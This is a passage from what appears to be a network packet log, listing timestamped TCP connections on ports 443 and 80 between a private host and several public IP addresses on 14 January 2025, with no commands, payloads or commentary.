                                Jan 14, 2025 04:33:04.084124088 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.084136963 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:04.087986946 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:04.088067055 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.088727951 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.088849068 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.088912010 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:04.102719069 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.112268925 CET49759443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.112314939 CET44349759203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.122129917 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.122144938 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.122193098 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.122240067 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.122246027 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.125483990 CET49756443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.125504971 CET44349756203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.128184080 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.128221989 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.128287077 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.128576040 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.128587008 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.139349937 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.139360905 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:04.146925926 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.146971941 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.146987915 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.146994114 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.147032022 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.147511005 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.147531033 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.147559881 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.147566080 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.147582054 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.148188114 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.148226023 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.148245096 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.148250103 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.148268938 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.148415089 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.148480892 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.148488998 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.151271105 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.151338100 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.151345015 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.152159929 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.152219057 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.152225971 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.186646938 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.201992035 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.201998949 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.205687046 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.205720901 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.205749989 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.205756903 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.205777884 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.206739902 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:04.206918001 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:04.206995010 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.207367897 CET49763443192.168.2.4104.26.12.205
                                Jan 14, 2025 04:33:04.207379103 CET44349763104.26.12.205192.168.2.4
                                Jan 14, 2025 04:33:04.212035894 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.212061882 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.212088108 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.212095022 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.212117910 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.237782955 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.237833023 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.237858057 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.237864017 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.237899065 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.237957001 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.237977028 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.238010883 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.238017082 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.238029003 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.238192081 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.238243103 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.238249063 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.238987923 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.239053965 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.239059925 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.239201069 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.239257097 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.239262104 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.239968061 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.240020037 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.240025997 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.240226030 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.240288973 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.240293026 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.240912914 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.240966082 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.240971088 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.241784096 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.241839886 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.241844893 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.241910934 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.241967916 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.241972923 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.242779970 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.242842913 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.242847919 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.282083035 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.282165051 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.282171011 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.296355009 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.296397924 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.296421051 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.296426058 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.296463966 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.302639961 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.302678108 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.302692890 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.302697897 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.302726984 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.302889109 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.302944899 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.302949905 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328218937 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328283072 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.328289032 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328344107 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328372002 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328386068 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.328391075 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328402042 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328417063 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328417063 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.328432083 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.328445911 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.328871965 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328927994 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.328933001 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.328949928 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.329004049 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.329009056 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.329180002 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.329221010 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.329226971 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.329591036 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.329636097 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.329641104 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.329768896 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.329823017 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.329828978 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.329983950 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330034018 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.330039978 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330671072 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330718994 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.330724001 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330764055 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330811024 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.330816984 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330843925 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330881119 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.330885887 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330925941 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.330930948 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.330976963 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.331012964 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.331247091 CET49760443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.331263065 CET44349760203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.730942965 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.731197119 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.731216908 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.731678009 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.732011080 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.732083082 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.732156992 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.775329113 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.997972965 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.998002052 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:04.998060942 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:04.998080015 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:05.052751064 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:05.062462091 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:05.062472105 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:05.062521935 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:05.062561989 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:05.062567949 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:05.062671900 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:05.062735081 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:05.069443941 CET49764443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:05.069473982 CET44349764203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:05.307033062 CET44349743108.167.132.194192.168.2.4
                                Jan 14, 2025 04:33:05.307121992 CET44349743108.167.132.194192.168.2.4
                                Jan 14, 2025 04:33:05.307291985 CET49743443192.168.2.4108.167.132.194
                                Jan 14, 2025 04:33:05.932605028 CET44349737216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:05.932678938 CET44349737216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:05.932785034 CET49737443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:33:05.999538898 CET49743443192.168.2.4108.167.132.194
                                Jan 14, 2025 04:33:05.999538898 CET49743443192.168.2.4108.167.132.194
                                Jan 14, 2025 04:33:05.999538898 CET49737443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:33:05.999612093 CET44349743108.167.132.194192.168.2.4
                                Jan 14, 2025 04:33:05.999651909 CET44349737216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:05.999707937 CET49743443192.168.2.4108.167.132.194
                                Jan 14, 2025 04:33:06.207369089 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.211920977 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.212119102 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.212349892 CET49757443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.212393045 CET44349757203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.215585947 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.215677023 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.215760946 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.216296911 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.216377020 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.217416048 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.217502117 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.217840910 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.217953920 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.217983007 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.808478117 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.809262991 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.809326887 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.809814930 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.810292006 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.810384035 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.810575008 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.818708897 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.818979025 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.819011927 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.819304943 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.819575071 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.819638014 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.819674015 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.853321075 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:06.853383064 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.863358974 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:06.869431973 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.085237026 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.085506916 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.085598946 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.086096048 CET49767443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.086137056 CET44349767203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.094134092 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.094151974 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.094158888 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.094294071 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.094294071 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.094329119 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.094408035 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.096246958 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.096302032 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.096355915 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.096405029 CET49768443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.096436024 CET44349768203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.099473000 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.099513054 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.100234985 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.100318909 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.100411892 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.100532055 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.109343052 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.109364033 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.109762907 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.109803915 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.710249901 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.710602999 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.710669041 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.710992098 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.711591959 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.711663961 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.711916924 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.727729082 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.728069067 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.728128910 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.728605986 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.728908062 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.728996038 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.729013920 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.755325079 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.771370888 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.777326107 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.978832006 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.978856087 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.978930950 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.978981972 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.982258081 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:07.982311964 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.982392073 CET49772443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:07.982418060 CET44349772203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.001885891 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.002123117 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.002296925 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.002345085 CET49771443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.002362967 CET44349771203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.003340960 CET49779443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.003390074 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.003479958 CET49779443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.003654003 CET49779443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.003669024 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.594428062 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.641598940 CET49779443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.641633034 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.642990112 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.643378019 CET49779443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.643591881 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.643795013 CET49779443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.691333055 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.858107090 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.858390093 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:08.858542919 CET49779443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.858658075 CET49779443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:08.858675957 CET44349779203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:09.012800932 CET4972380192.168.2.42.22.50.144
                                Jan 14, 2025 04:33:09.017951965 CET80497232.22.50.144192.168.2.4
                                Jan 14, 2025 04:33:09.018002987 CET4972380192.168.2.42.22.50.144
                                Jan 14, 2025 04:33:10.253797054 CET44349744108.167.132.194192.168.2.4
                                Jan 14, 2025 04:33:10.253904104 CET44349744108.167.132.194192.168.2.4
                                Jan 14, 2025 04:33:10.254101038 CET49744443192.168.2.4108.167.132.194
                                Jan 14, 2025 04:33:11.993905067 CET49744443192.168.2.4108.167.132.194
                                Jan 14, 2025 04:33:11.993974924 CET44349744108.167.132.194192.168.2.4
                                Jan 14, 2025 04:33:16.686290026 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:16.686394930 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:16.686523914 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:16.688087940 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:16.688122034 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:17.302242041 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:17.302655935 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:17.302720070 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:17.303845882 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:17.304146051 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:17.304259062 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:17.304270983 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:17.304327011 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:17.352056980 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.037765980 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.043131113 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.043195963 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.043430090 CET49783443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.043447018 CET44349783203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.047564030 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.047595978 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.047653913 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.047837973 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.047851086 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.725094080 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.725631952 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.725652933 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.727142096 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.727771044 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.727871895 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.727874041 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.775337934 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.789288044 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.993453979 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.993705034 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:24.993762970 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.994052887 CET49784443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:24.994067907 CET44349784203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:33.792121887 CET804974170.32.23.62192.168.2.4
                                Jan 14, 2025 04:33:33.792212963 CET4974180192.168.2.470.32.23.62
                                Jan 14, 2025 04:33:34.009454966 CET4974180192.168.2.470.32.23.62
                                Jan 14, 2025 04:33:34.014636993 CET804974170.32.23.62192.168.2.4
                                Jan 14, 2025 04:33:37.465209007 CET49785443192.168.2.4203.161.57.139
